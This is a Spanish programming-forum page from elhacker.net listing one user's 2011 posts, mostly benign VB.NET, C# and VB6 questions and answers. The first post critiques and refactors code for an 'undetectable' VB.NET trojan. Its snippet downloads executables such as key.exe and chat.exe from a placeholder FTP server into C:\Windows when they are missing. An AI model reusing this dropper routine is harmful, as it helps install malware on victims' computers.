elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 19
1  Programación / .NET (C#, VB.NET, ASP) / Re: Troyano en VB.NET (indectectable) en: 11 Septiembre 2011, 00:00 am
Hola,

Como siempre digo, la idea está bien! de que funciona, si lo hace, pero el código esta demasiado 'sucio'.
Que manía de dejar los controles sin nombre (TextBox1 podría ser NameTxt), ¿no conoces las funciones (Function) y Procedimientos (Sub)? o todo era parte del 'indetectamiento' xD

Podrías reducir mucho el código y darle mayor 'calidad' si usas procedimientos para realizar las tareas por ejemplo de comprobar la existencia de los archivos, el código es muy redundante al respecto, cuando repites una acción más de 2 veces es adecuado usar funciones y/o procedimientos.

Algo así:
Código
  1. Imports ejemplo.My
  2.  
  3. Module Module1
  4.    Sub Main()
  5.        Dim exe As Array
  6.        exe = {"key.exe", "chat.exe", "mchat.exe", "ord.exe"}
  7.        Exist("C:\Windows\", exe)
  8.    End Sub
  9.  
  10.    Private Sub Exist(ByVal Dir As String, ByRef files As Array)
  11.        Dim i As Object
  12.        For Each i In files
  13.            If Not Computer.FileSystem.FileExists(Dir + i.ToString) Then
  14.                My.Computer.Network.DownloadFile("ftp://servidor/"+i.ToString, Dir + i.ToString, "user", "passw")
  15.            End If
  16.        Next
  17.    End Sub
  18. End Module

Como vez, paso el nombre de los archivos en un solo array a la función "Exist" ahorrando como 4 sentencias if, imagina que hubieran sido 100 archivos dudo que escribieras todas esas sentencias if.
Si quisieras modificar la ruta por ejemplo, solo tendrías que cambiar un parámetro y no editar todos los ifs.

No soy programador de VB.Net pero es prácticamente igual a C# (Quitando la sintaxis, aunque no podía evitar colocar ";" al final Dx).
Las buenas prácticas te pueden servir mucho en el futuro ;)

SaluDOS!
PD: Por cierto acomodar tu código en las etiquetas [code=vb.net]'Aquí tu codigo[/code] no se vería nada mal :)
2  Programación / .NET (C#, VB.NET, ASP) / Re: Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 7 Septiembre 2011, 05:34 am
D:

Aunque me sirvió navegar el Google buscando tu topic, llegué a dar con un S.O escrito en C# (Compilado con IL2CPU o algo así).
Y encontré ese topic, pero sinceramente no entendí mucho, si fuese posible, como sería el procedimiento en VS10? (Después de usar Mono no entiendo el VS) :P

Si escribieron un S.O de menos de 2megas que entra en un discket en C# debe ser posible ejecutar un "Hola Mundo!!!" sin necesidad de tanta cosa. Supongo no.

SaluDOS!
3  Programación / .NET (C#, VB.NET, ASP) / Re: Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 6 Septiembre 2011, 22:29 pm
usa el buscador, cree un post hace unos meses de como hacerlo.
Hace unos meses O.ô?
He leído (rápidamente) todos tus topics hasta mayo ("La materia que más os a costado" o algo por ahí era el último) y no encuentro nada referente al tema menos en el buscador (Que por cierto es lo primero que hice ¬¬)
4  Programación / .NET (C#, VB.NET, ASP) / Re: Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 6 Septiembre 2011, 10:10 am
Un trozo de código que muestra como:

Código
  1.  Dim [Assembly] As Assembly = Assembly.LoadFile("C:\Ejemplo.exe")
  2.  
  3.        For Each Dll As AssemblyName In [Assembly].GetReferencedAssemblies
  4.            Console.WriteLine(Dll.Name & " " & Dll.Version.ToString)
  5.        Next
Solo me muestra MsCorEE (O era MsCord¿?) aún incluyendo la dll en el directorio junto con lo demás no funciona. D:

@seba123neo
Como podría embeber las referencias en la aplicación, lo he intentado pero no me funciona.
Por cierto, esto:
Portable Library Tools - VisualStudio MSDN
Alguien con "VS 2010 sp1" podría probarlo xD, ¿precisamente para que sirve? (No tengo el sp1, y son 512mb de descarga D:)

SaluDOS!
5  Programación / .NET (C#, VB.NET, ASP) / Re: Multiples Bucles o Multiples Esperas en: 5 Septiembre 2011, 23:11 pm
Hola,

No logré captar exactamente lo que quiere decir la imagen. (Podrías por lo menos usar diagramas de flujo ;))
Tengo algo que más o menos comprendí, con 2 botones en el Form:
Código
  1. Public Class Form1
  2.    Private a As Integer = 0
  3.    Private n As Integer = 0
  4.  
  5.    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  6.        Dim n_local As Integer = n
  7.        n = n + 1
  8.        Do
  9.            Application.DoEvents()
  10.        Loop Until (a = 1)
  11.        MsgBox("Hola" & n_local)
  12.    End Sub
  13.  
  14.    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  15.        a = 1
  16.    End Sub
  17. End Class

Espero te sirva :P

SaluDOS!
6  Programación / .NET (C#, VB.NET, ASP) / Re: Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 5 Septiembre 2011, 22:26 pm
:P

Estuve leyendo un artículo en la MSDN:
/lib (Opciones del compilador de C#)
En específico, leer sobre "/Reference", aunque dudo que sirva (O quizá si).

No se como listar las dependencias de un ejecutable (Aparte de las que indica el Visual Studio), por ejemplo está "MsCorEE.dll" ..
Bueno, seguiré esperando D:

SaluDOS!
7  Programación / .NET (C#, VB.NET, ASP) / Re: Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 5 Septiembre 2011, 21:57 pm
Gracias por responder.

Es una aplicación de consola, no tiene muchas dependencias.
Lo que estaba intentando es hacer correr un "Hola Mundo!" escrito en C# (Para comenzar) en Windows XP sp3 en un Virtual, con la aplicación mencionada anteriormente genera un ejecutable de 3mb apróx., pero me interesa incluir las Dll's fuera y no dentro del ensamblado pero linkeados.

Por cierto, copié TODAS las dll's del .Net y no funcionó D: vaya a ser por que (O quizá me confundí y copié las de Mono ¬¬).

Espero tu respuesta sobre el código que tienes para obtener las dependencias. ;)

SaluDOS!
8  Programación / .NET (C#, VB.NET, ASP) / Es posible incluir solo las dependencias (Dlls) sin instalar todo el framework? en: 5 Septiembre 2011, 11:14 am
Wenas,

Mi pregunta iba más orientada a C#, pero el caso es el mismo para VB.Net,
No comprendo la idea de poder permitir "Copiar en local" las referencias. Por ejemplo "system.dll" si necesariamente necesita el framework.

En resumen, es posible hacer un link de las dll's necesarias con la aplicación para que no dependa de todo el framework?
Tal como es el caso de Visual C++, que es posible distribuir el runtime y todo funciona de maravilla, hay algo posible o parecido para C# o vb.net?

Si no me expliqué bien, preguntad  :¬¬ (Ando durmiendo por el teclado)

SaluDOS!!!
9  Programación / Programación Visual Basic / Re: Como realizo una resta en tipos definidos por el usuario? (Con LSet y uLong¿?) en: 21 Agosto 2011, 23:39 pm
Precisamente estaba pensando en esos 2 Bytes, gracias por aclarar, me va ha servir tu ejemplo ;)
Tengo otra duda que me saltó, por que esto 'esta mal'?

Código
  1. Private Type bByte
  2.    L() As Byte
  3. End Type
  4.  
  5. Private Sub Form_Load()
  6.    Dim EJ As bByte
  7.    ReDim EJ.L(1 to 100) As Byte
  8.    MsgBox LenB(EJ) ' => 4 ¿o.O?
  9. End Sub

Supongo que es por que es una variable dinámica, pero ¿no hay forma?,

SaluDOS!!!
10  Programación / Programación Visual Basic / Como realizo una resta en tipos definidos por el usuario? (Con LSet y uLong¿?) en: 21 Agosto 2011, 22:18 pm
Hola,

No pude pensar en un mejor título que describa el topic, lamento eso :P
Quiero realizar una resta de 2 números de 16 Bytes, pero es un UDT..
Código
  1. Private Type cD
  2.    A As Long
  3.    B As Long
  4.    C As Long
  5.    D As Long
  6. End Type
  7.  
  8. Private Type tStrg
  9.    tStrg As String * 8
  10. End Type
  11.  
  12. Private Sub Form_Load()
  13.    Dim One As cD, Two As cD, Res As cD
  14.    Dim LS As tStrg
  15.    LS.tStrg = "86420"
  16.    LSet One = LS
  17.    LS.tStrg = "6020"
  18.    LSet Two = LS
  19.    ' Aquí no se como restar ONE - TWO usando el UTD Res
  20.    ' El resultado se mostraría así ..:
  21.    With Res
  22.            ' Operaciones que no se como .¿?
  23.    End With
  24.    LSet LS = Res
  25. End Sub

Pensé en restar One.A con Two.A, y así sucesivamente, pero no funciona (De todas formas no tiene lógica para funcionar así),
No se si esto sirva, pero más o menos es lo que debería devolver:
Citar
  ONE       . TWO       . RES
A 3539000 . 3145782 . 3145784
B 3276852 . 3145778 . 3145780
C 2097200 . 2097184 . 2097200
D 2097184 . 2097184 . 2097184
  =86420  . =6020    . =80400
Más o menos creo que capta la idea ..
Alguna ayuda :P

SaluDOS!!!
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 19
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines